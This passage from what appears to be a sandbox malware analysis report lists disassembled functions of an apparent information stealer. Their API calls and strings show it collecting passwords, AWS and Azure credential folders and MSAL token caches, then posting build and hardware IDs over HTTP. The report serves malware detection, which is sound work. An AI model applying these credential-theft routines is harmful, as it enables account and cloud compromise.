                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                        • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                        • API String ID: 2840494320-4129404369
                                                                                                                                                        • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                        • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                                                                        • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                        • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98
                                                                                                                                                        Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230stringmemoryfileCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                        • String ID: passwords.txt
                                                                                                                                                        • API String ID: 1956182324-347816968
                                                                                                                                                        • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                                                        • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                                                                        • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                                                        • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59
                                                                                                                                                        Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378networkstringfileCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2613 404b2e-404bf3 call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 2628 404bf5 2613->2628 2629 404bfb-404c01 2613->2629 2628->2629 2630 405194-405236 InternetCloseHandle call 402920 * 8 call 41d016 2629->2630 2631 404c07-404d91 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 2629->2631 2631->2630 2700 404d97-404dd1 HttpOpenRequestA 2631->2700 2701 404dd7-404ddd 2700->2701 2702 405188-40518e InternetCloseHandle 2700->2702 2703 404dfb-40511a call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 4104e7 call 4105c7 * 2 call 41058d call 402920 * 2 lstrlenA * 2 HttpSendRequestA 2701->2703 2704 404ddf-404df5 InternetSetOptionA 2701->2704 2702->2630 2807 40515c-405174 InternetReadFile 2703->2807 2704->2703 2808 405176-405183 InternetCloseHandle call 402920 2807->2808 2809 40511c-405124 2807->2809 2808->2702 2809->2808 2811 405126-405157 call 410609 call 41058d call 402920 2809->2811 2811->2807
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                        • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                                                                        • API String ID: 3006978581-858375883
                                                                                                                                                        • Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                                                        • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                                                                        • Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                                                        • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                                                                                        Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                                                        • wsprintfW.USER32 ref: 004016BC
                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                                                        • _time64.MSVCRT ref: 0040170E
                                                                                                                                                        • srand.MSVCRT ref: 00401715
                                                                                                                                                        • rand.MSVCRT ref: 0040171E
                                                                                                                                                        • _memset.LIBCMT ref: 0040172E
                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                                                        • _memset.LIBCMT ref: 00401763
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                                                        • _memset.LIBCMT ref: 004017BE
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                        • String ID: %s%s$delays.tmp
                                                                                                                                                        • API String ID: 1620473967-1413376734
                                                                                                                                                        • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                        • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                                                                        • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                        • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                                                                        Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 004164E2
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                                                                        • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                        • _memset.LIBCMT ref: 00416556
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                                                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                        • _memset.LIBCMT ref: 004165CA
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                                                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                                                                        • _memset.LIBCMT ref: 0041663E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                        • API String ID: 4216275855-974132213
                                                                                                                                                        • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                                                        • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                                                                        • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                                                        • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                                                                        Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1956182324-0
                                                                                                                                                        • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                        • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                                                        • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                        • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                                                        Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
